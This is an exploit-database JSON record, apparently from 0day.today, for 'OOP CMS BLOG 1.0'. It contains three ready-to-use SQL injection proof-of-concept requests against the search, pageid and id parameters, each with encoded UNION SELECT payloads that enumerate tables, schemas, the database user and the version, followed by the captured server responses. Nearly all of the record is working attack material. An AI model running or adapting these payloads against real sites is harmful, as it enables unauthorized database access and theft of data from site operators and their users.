Description
Exploit for php platform in category web applications
{"id": "1337DAY-ID-31548", "type": "zdt", "bulletinFamily": "exploit", "title": "OOP CMS BLOG 1.0 - search SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-07T00:00:00", "modified": "2018-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31548", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-11-07T22:58:12", "viewCount": 296, "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 7.1}, "sourceHref": "https://0day.today/exploit/31548", "sourceData": "# Exploit Title: OOP CMS BLOG 1.0 - 'search' SQL Injection\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://zsoft.com.bd/\r\n# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/search.php?search=[SQL]\r\n# \r\nGET /[PATH]/search.php?search=Efe%27%20%20UNION%20SELECT%201,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:[email\u00a0protected]%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7,8,9--%20- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:31:15 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/page.php?pageid=[SQL]\r\n# \r\nGET /[PATH]/page.php?pageid=8%20%20UNION(SELECT%20%28%31%29,%28%32%29,(SELECT%20GROUP_CONCAT(schema_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.SCHEMATA))--%20- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:33:44 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/posts.php?id=[SQL]\r\n# \r\nGET /[PATH]/posts.php?id=3%27++UNION+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:35:57 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 3732\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-07] #", "_state": {"dependencies": 1647589307, "score": 1683995972, "epss": 1678871604}, "_internal": {"score_hash": "219cba2e57542b510e0ff7639eeaa56a"}}
{}